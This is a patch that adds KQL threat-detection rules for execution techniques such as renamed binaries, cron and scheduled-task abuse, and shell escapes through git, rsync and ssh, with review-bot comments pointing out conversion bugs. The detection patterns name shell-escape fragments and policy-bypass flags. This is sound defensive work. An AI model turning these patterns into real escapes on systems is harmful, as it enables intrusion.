+// Author: Roberto Rodriguez @Cyb3rWard0g
+// Date: 2019-09-12
+// Level: medium
+// Description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1059.001, attack.t1021.006
+// False Positives:
+// - Legitimate usage of remote Powershell, e.g. for monitoring purposes.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\wsmprovhost.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/renamed_curl_exe_execution.kql b/KQL/rules/Execution/renamed_curl_exe_execution.kql
new file mode 100644
index 00000000..be3e657b
--- /dev/null
+++ b/KQL/rules/Execution/renamed_curl_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed CURL.EXE Execution
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-09-11
+// Level: medium
+// Description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where (ProcessVersionInfoOriginalFileName =~ "curl.exe" or ProcessVersionInfoFileDescription =~ "The curl executable") and (not(FolderPath contains "\\curl"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/renamed_ftp_exe_execution.kql b/KQL/rules/Execution/renamed_ftp_exe_execution.kql
new file mode 100644
index 00000000..a5133238
--- /dev/null
+++ b/KQL/rules/Execution/renamed_ftp_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed FTP.EXE Execution
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "ftp.exe" and (not(FolderPath endswith "\\ftp.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/renamed_jusched_exe_execution.kql b/KQL/rules/Execution/renamed_jusched_exe_execution.kql
new file mode 100644
index 00000000..bffe87f0
--- /dev/null
+++ b/KQL/rules/Execution/renamed_jusched_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed Jusched.EXE Execution
+// Author: Markus Neis, Swisscom
+// Date: 2019-06-04
+// Level: high
+// Description: Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1036.003
+
+DeviceProcessEvents
+| where (ProcessVersionInfoFileDescription in~ ("Java Update Scheduler", "Java(TM) Update Scheduler")) and (not(FolderPath endswith "\\jusched.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/renamed_nircmd_exe_execution.kql b/KQL/rules/Execution/renamed_nircmd_exe_execution.kql
new file mode 100644
index 00000000..7595782e
--- /dev/null
+++ b/KQL/rules/Execution/renamed_nircmd_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed NirCmd.EXE Execution
+// Author: X__Junior (Nextron Systems)
+// Date: 2024-03-11
+// Level: high
+// Description: Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "NirCmd.exe" and (not((FolderPath endswith "\\nircmd.exe" or FolderPath endswith "\\nircmdc.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/renamed_pingcastle_binary_execution.kql b/KQL/rules/Execution/renamed_pingcastle_binary_execution.kql
new file mode 100644
index 00000000..5e8b56e3
--- /dev/null
+++ b/KQL/rules/Execution/renamed_pingcastle_binary_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed PingCastle Binary Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2024-01-11
+// Level: high
+// Description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where ((ProcessVersionInfoOriginalFileName in~ ("PingCastleReporting.exe", "PingCastleCloud.exe", "PingCastle.exe")) or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ")) and (not((FolderPath endswith "\\PingCastleReporting.exe" or FolderPath endswith "\\PingCastleCloud.exe" or FolderPath endswith "\\PingCastle.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/renamed_psexec_service_execution.kql b/KQL/rules/Execution/renamed_psexec_service_execution.kql
new file mode 100644
index 00000000..8cf3205d
--- /dev/null
+++ b/KQL/rules/Execution/renamed_psexec_service_execution.kql
@@ -0,0 +1,12 @@
+// Title: Renamed PsExec Service Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate administrative tasks
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "psexesvc.exe" and (not(FolderPath =~ "C:\\Windows\\PSEXESVC.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/ruby_inline_command_execution.kql b/KQL/rules/Execution/ruby_inline_command_execution.kql
new file mode 100644
index 00000000..4ad30b7c
--- /dev/null
+++ b/KQL/rules/Execution/ruby_inline_command_execution.kql
@@ -0,0 +1,10 @@
+// Title: Ruby Inline Command Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-02
+// Level: medium
+// Description: Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -e" and (FolderPath endswith "\\ruby.exe" or ProcessVersionInfoOriginalFileName =~ "ruby.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/scheduled_cron_task_job_linux.kql b/KQL/rules/Execution/scheduled_cron_task_job_linux.kql
new file mode 100644
index 00000000..779f7ee4
--- /dev/null
+++ b/KQL/rules/Execution/scheduled_cron_task_job_linux.kql
@@ -0,0 +1,12 @@
+// Title: Scheduled Cron Task/Job - Linux
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-06
+// Level: medium
+// Description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.003
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/tmp/" and FolderPath endswith "crontab"
\ No newline at end of file
diff --git a/KQL/rules/Execution/scheduled_cron_task_job_macos.kql b/KQL/rules/Execution/scheduled_cron_task_job_macos.kql
new file mode 100644
index 00000000..64b63d10
--- /dev/null
+++ b/KQL/rules/Execution/scheduled_cron_task_job_macos.kql
@@ -0,0 +1,12 @@
+// Title: Scheduled Cron Task/Job - MacOs
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-06
+// Level: medium
+// Description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.003
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/tmp/" and FolderPath endswith "/crontab"
\ No newline at end of file
diff --git a/KQL/rules/Execution/scheduled_task_creation_via_schtasks_exe.kql b/KQL/rules/Execution/scheduled_task_creation_via_schtasks_exe.kql
new file mode 100644
index 00000000..49a6d73a
--- /dev/null
+++ b/KQL/rules/Execution/scheduled_task_creation_via_schtasks_exe.kql
@@ -0,0 +1,13 @@
+// Title: Scheduled Task Creation Via Schtasks.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-01-16
+// Level: low
+// Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, attack.s0111, car.2013-08-001, stp.1u
+// False Positives:
+// - Administrative activity
+// - Software installation
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /create " and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI"))) and (not((ProcessCommandLine contains "Microsoft\\Office\\Office Performance Monitor" and (FolderPath in~ ("C:\\Windows\\System32\\schtasks.exe", "C:\\Windows\\SysWOW64\\schtasks.exe")) and (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/script_event_consumer_spawning_process.kql b/KQL/rules/Execution/script_event_consumer_spawning_process.kql
new file mode 100644
index 00000000..ecf4fcf9
--- /dev/null
+++ b/KQL/rules/Execution/script_event_consumer_spawning_process.kql
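Review bot: The exclusion `not((AccountName contains "AUTHORI" or AccountName contains "AUTORI"))` is meant to drop tasks created by NT AUTHORITY\SYSTEM, but in DeviceProcessEvents the AccountName column normally holds only the user part (e.g. `system`) while the domain sits in AccountDomain, so the filter is unlikely ever to match and system-created tasks will alert despite the "by user accounts" description. Consider `not(AccountDomain =~ "NT AUTHORITY" or AccountDomain contains "AUTORI")`, or matching on `strcat(AccountDomain, "\\", AccountName)` to keep the source rule's semantics. This looks like a generic field-mapping issue in the converter (a domain-qualified user field mapped to AccountName alone), so it is worth checking the other converted rules that filter on account names.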
@@ -0,0 +1,10 @@
+// Title: Script Event Consumer Spawning Process
+// Author: Sittikorn S
+// Date: 2021-06-21
+// Level: high
+// Description: Detects a suspicious child process of Script Event Consumer (scrcons.exe).
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msbuild.exe") and InitiatingProcessFolderPath endswith "\\scrcons.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/script_interpreter_execution_from_suspicious_folder.kql b/KQL/rules/Execution/script_interpreter_execution_from_suspicious_folder.kql
new file mode 100644
index 00000000..1c970738
--- /dev/null
+++ b/KQL/rules/Execution/script_interpreter_execution_from_suspicious_folder.kql
@@ -0,0 +1,10 @@
+// Title: Script Interpreter Execution From Suspicious Folder
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-02-08
+// Level: high
+// Description: Detects a suspicious script execution in temporary folders or folders accessible by environment variables
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -ep bypass " or ProcessCommandLine contains " -ExecutionPolicy bypass " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains "/e:javascript " or ProcessCommandLine contains "/e:Jscript " or ProcessCommandLine contains "/e:vbscript ") or (FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "mshta.exe", "wscript.exe"))) and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\Windows\\Temp") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..7067667c
--- /dev/null
+++ b/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,14 @@
+// Title: Service Reconnaissance Via Wmic.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-14
+// Level: medium
+// Description: An adversary might use WMI to check if a certain remote service is running on a remote device.
+When the test completes, a service information will be displayed on the screen if it exists.
+A common feedback message is that "No instance(s) Available" if the service queried is not running.
+A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "service" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/service_started_stopped_via_wmic_exe.kql b/KQL/rules/Execution/service_started_stopped_via_wmic_exe.kql
new file mode 100644
index 00000000..0a722440
--- /dev/null
+++ b/KQL/rules/Execution/service_started_stopped_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Service Started/Stopped Via Wmic.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects usage of wmic to start or stop a service
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "stopservice" or ProcessCommandLine contains "startservice") and (ProcessCommandLine contains " service " and ProcessCommandLine contains " call ")) and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/service_startuptype_change_via_powershell_set_service.kql b/KQL/rules/Execution/service_startuptype_change_via_powershell_set_service.kql
new file mode 100644
index 00000000..978851f5
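Review bot: The three continuation lines of the Description in this hunk (`When the test completes…`, `A common feedback message…`, `A common error message…`) are emitted without the `//` prefix, so they are not comments in the .kql file and the query will fail to parse before it reaches `DeviceProcessEvents`. Each wrapped line of a multi-line description needs to start with `// `, e.g. `+// When the test completes, a service information will be displayed on the screen if it exists.`. The same unprefixed continuation lines appear in the sql_client_tools_powershell_session_detection, suspicious_deno_file_written_from_remote_source, suspicious_download_and_execute_pattern_via_curl_wget and suspicious_explorer_process_with_whitespace_padding_clickfix_filefix hunks, which suggests the conversion script writes multi-line Sigma descriptions verbatim; fixing it in the generator would cover all of them.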
--- /dev/null
+++ b/KQL/rules/Execution/service_startuptype_change_via_powershell_set_service.kql
@@ -0,0 +1,12 @@
+// Title: Service StartupType Change Via PowerShell Set-Service
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-04
+// Level: medium
+// Description: Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - False positives may occur with troubleshooting scripts
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "Disabled" or ProcessCommandLine contains "Manual") and (ProcessCommandLine contains "Set-Service" and ProcessCommandLine contains "-StartupType")) and (FolderPath endswith "\\powershell.exe" or ProcessVersionInfoOriginalFileName =~ "PowerShell.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Execution/service_startuptype_change_via_sc_exe.kql b/KQL/rules/Execution/service_startuptype_change_via_sc_exe.kql
new file mode 100644
index 00000000..d6155e69
--- /dev/null
+++ b/KQL/rules/Execution/service_startuptype_change_via_sc_exe.kql
@@ -0,0 +1,12 @@
+// Title: Service StartupType Change Via Sc.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: medium
+// Description: Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - False positives may occur with troubleshooting scripts
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "disabled" or ProcessCommandLine contains "demand") and (ProcessCommandLine contains " config " and ProcessCommandLine contains "start")) and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/shell_execution_of_process_located_in_tmp_directory.kql b/KQL/rules/Execution/shell_execution_of_process_located_in_tmp_directory.kql
new file mode 100644
index 00000000..cd79de2f
--- /dev/null
+++ b/KQL/rules/Execution/shell_execution_of_process_located_in_tmp_directory.kql
@@ -0,0 +1,10 @@
+// Title: Shell Execution Of Process Located In Tmp Directory
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: high
+// Description: Detects execution of shells from a parent process located in a temporary (/tmp) directory
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (FolderPath endswith "/bash" or FolderPath endswith "/csh" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/ksh" or FolderPath endswith "/sh" or FolderPath endswith "/zsh") and InitiatingProcessFolderPath startswith "/tmp/"
\ No newline at end of file
diff --git a/KQL/rules/Execution/shell_execution_via_git_linux.kql b/KQL/rules/Execution/shell_execution_via_git_linux.kql
new file mode 100644
index 00000000..fb6507ce
--- /dev/null
+++ b/KQL/rules/Execution/shell_execution_via_git_linux.kql
@@ -0,0 +1,11 @@
+// Title: Shell Execution via Git - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "bash 0<&1" or ProcessCommandLine contains "dash 0<&1" or ProcessCommandLine contains "sh 0<&1") and (InitiatingProcessCommandLine contains " -p " and InitiatingProcessCommandLine contains "help") and InitiatingProcessFolderPath endswith "/git"
\ No newline at end of file
diff --git a/KQL/rules/Execution/shell_execution_via_rsync_linux.kql b/KQL/rules/Execution/shell_execution_via_rsync_linux.kql
new file mode 100644
index 00000000..2505dcd6
--- /dev/null
+++ b/KQL/rules/Execution/shell_execution_via_rsync_linux.kql
@@ -0,0 +1,13 @@
+// Title: Shell Execution via Rsync - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.), Florian Roth
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Legitimate cases in which "rsync" is used to execute a shell
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/ash " or ProcessCommandLine contains "/bash " or ProcessCommandLine contains "/dash " or ProcessCommandLine contains "/csh " or ProcessCommandLine contains "/sh " or ProcessCommandLine contains "/zsh " or ProcessCommandLine contains "/tcsh " or ProcessCommandLine contains "/ksh " or ProcessCommandLine contains "'ash " or ProcessCommandLine contains "'bash " or ProcessCommandLine contains "'dash " or ProcessCommandLine contains "'csh " or ProcessCommandLine contains "'sh " or ProcessCommandLine contains "'zsh " or ProcessCommandLine contains "'tcsh " or ProcessCommandLine contains "'ksh ") and (ProcessCommandLine contains " -e " and (FolderPath endswith "/rsync" or FolderPath endswith "/rsyncd"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql b/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql
new file mode 100644
index 00000000..6a45c72d
--- /dev/null
+++ b/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql
@@ -0,0 +1,13 @@
+// Title: Shell Invocation via Env Command - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Github operations such as ghe-backup
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "/bin/bash" or ProcessCommandLine endswith "/bin/dash" or ProcessCommandLine endswith "/bin/fish" or ProcessCommandLine endswith "/bin/sh" or ProcessCommandLine endswith "/bin/zsh") and FolderPath endswith "/env"
\ No newline at end of file
diff --git a/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql b/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql
new file mode 100644
index 00000000..3a434d12
--- /dev/null
+++ b/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql
@@ -0,0 +1,11 @@
+// Title: Shell Invocation Via Ssh - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-08-29
+// Level: high
+// Description: Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh" or ProcessCommandLine contains "sh 0<&2 1>&2" or ProcessCommandLine contains "sh 1>&2 0<&2") and ((ProcessCommandLine contains "ProxyCommand=;" or ProcessCommandLine contains "permitlocalcommand=yes" or ProcessCommandLine contains "localhost") and FolderPath endswith "/ssh")
\ No newline at end of file
diff --git a/KQL/rules/Execution/silenttrinity_stager_msbuild_activity.kql b/KQL/rules/Execution/silenttrinity_stager_msbuild_activity.kql
new file mode 100644
index 00000000..0e7beea9
--- /dev/null
+++ b/KQL/rules/Execution/silenttrinity_stager_msbuild_activity.kql
@@ -0,0 +1,10 @@
+// Title: Silenttrinity Stager Msbuild Activity
+// Author: Kiran kumar s, oscd.community
+// Date: 2020-10-11
+// Level: high
+// Description: Detects a possible remote connections to Silenttrinity c2
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1127.001
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\msbuild.exe" and (RemotePort in~ ("80", "443"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql b/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql
new file mode 100644
index 00000000..3cab475f
--- /dev/null
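Review bot: In the silenttrinity_stager_msbuild_activity hunk, `RemotePort in~ ("80", "443")` compares the integer `RemotePort` column of DeviceNetworkEvents against string literals with the string-only `in~` operator, which the query engine rejects rather than coercing. The port filter should be numeric: `| where InitiatingProcessFolderPath endswith "\\msbuild.exe" and RemotePort in (80, 443)`. If the generator emits `in~` for every Sigma list value, other rules keyed on numeric columns are likely affected the same way.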
+++ b/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql
@@ -0,0 +1,14 @@
+// Title: SQL Client Tools PowerShell Session Detection
+// Author: Agro (@agro_sev) oscd.communitly
+// Date: 2020-10-13
+// Level: medium
+// Description: This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.
+Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1127
+// False Positives:
+// - Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action.
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\sqltoolsps.exe" or InitiatingProcessFolderPath endswith "\\sqltoolsps.exe" or ProcessVersionInfoOriginalFileName =~ "\\sqltoolsps.exe") and (not(InitiatingProcessFolderPath endswith "\\smss.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/start_windows_service_via_net_exe.kql b/KQL/rules/Execution/start_windows_service_via_net_exe.kql
new file mode 100644
index 00000000..cd8eafac
--- /dev/null
+++ b/KQL/rules/Execution/start_windows_service_via_net_exe.kql
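Review bot: The clause `ProcessVersionInfoOriginalFileName =~ "\\sqltoolsps.exe"` in the where line can never match, because the OriginalFileName version-info field holds a bare file name and never a leading path separator; the clause is dead and only the two FolderPath branches do any work. It should be `ProcessVersionInfoOriginalFileName =~ "sqltoolsps.exe"`, matching how the wmic and sc rules in this same patch spell their OriginalFileName values. The description's second line in this hunk also lacks the `//` prefix, as raised on the wmic reconnaissance hunk.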
@@ -0,0 +1,12 @@
+// Title: Start Windows Service Via Net.EXE
+// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
+// Date: 2019-10-21
+// Level: low
+// Description: Detects the usage of the "net.exe" command to start a service using the "start" flag
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002
+// False Positives:
+// - Legitimate administrator or user executes a service for legitimate reasons.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " start " and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/successful_account_login_via_wmi.kql b/KQL/rules/Execution/successful_account_login_via_wmi.kql
new file mode 100644
index 00000000..e1d4a6ee
--- /dev/null
+++ b/KQL/rules/Execution/successful_account_login_via_wmi.kql
@@ -0,0 +1,13 @@
+// Title: Successful Account Login Via WMI
+// Author: Thomas Patzke
+// Date: 2019-12-04
+// Level: low
+// Description: Detects successful logon attempts performed with WMI
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+// False Positives:
+// - Monitoring tools
+// - Legitimate system administration
+
+DeviceLogonEvents
+| where InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_binaries_and_scripts_in_public_folder.kql b/KQL/rules/Execution/suspicious_binaries_and_scripts_in_public_folder.kql
new file mode 100644
index 00000000..dea171ba
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_binaries_and_scripts_in_public_folder.kql
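Review bot: The successful_account_login_via_wmi hunk filters DeviceLogonEvents only on `InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe"`, but that table also carries failed logons, so the query does not implement the "successful" condition the title and description promise and will be noisier than the source rule. The success condition from the original (event 4624 in the Sigma source, presumably) needs to be carried over: `| where ActionType == "LogonSuccess" and InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe"`. A comment such as `// Successful logons only; failed attempts are excluded on purpose` would make the intent visible to the next maintainer.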
@@ -0,0 +1,12 @@
+// Title: Suspicious Binaries and Scripts in Public Folder
+// Author: The DFIR Report
+// Date: 2025-01-23
+// Level: high
+// Description: Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204
+// False Positives:
+// - Administrators deploying legitimate binaries to public folders.
+
+DeviceFileEvents
+| where FolderPath contains ":\\Users\\Public\\" and (FolderPath endswith ".bat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".js" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_binary_in_user_directory_spawned_from_office_application.kql b/KQL/rules/Execution/suspicious_binary_in_user_directory_spawned_from_office_application.kql
new file mode 100644
index 00000000..453e0bf3
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_binary_in_user_directory_spawned_from_office_application.kql
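Review bot: The where line queries DeviceFileEvents with no ActionType restriction, while the description says the rule detects file creation; DeviceFileEvents also records modifications, renames and deletions, so every delete of a stale `.exe` under Users\Public will fire this high-severity rule. Prefixing the filter with `ActionType == "FileCreated" and` restores the creation semantics of the source rule. The suspicious_deno_file_written_from_remote_source and suspicious_file_created_in_perflogs hunks later in this patch have the same unrestricted DeviceFileEvents query and would benefit from the same guard.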
@@ -0,0 +1,10 @@
+// Title: Suspicious Binary In User Directory Spawned From Office Application
+// Author: Jason Lynch
